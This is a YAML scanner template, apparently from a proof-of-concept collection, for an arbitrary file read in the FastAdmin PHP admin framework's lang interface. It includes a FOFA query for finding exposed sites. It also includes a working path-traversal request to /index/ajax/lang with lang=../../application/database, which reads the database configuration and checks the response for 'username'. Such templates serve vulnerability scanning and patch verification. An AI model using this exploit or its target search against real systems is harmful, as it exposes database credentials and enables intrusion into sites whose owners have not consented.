product: FastAdmin
vName: FastAdmin lang接口任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: FastAdmin 是一款基于PHP+Bootstrap开源后台框架,采用 Apache2 商业友好开源协议,FastAdmin 是专为开发者精心打造的一款开源后台框架,fastAdmin开发框架lang接口存在任意文件读取漏洞。
version: ''
note: ''
search:
  FOFA: body="fastadmin.net" || body="<h1>fastadmin</h1>" && title="fastadmin"
protocol: http
link: https://mp.weixin.qq.com/s/3eBtYB_XlFKvna08ZqT4oQ
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /index/ajax/lang?lang=../../application/database
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - '"username":'
            logic: and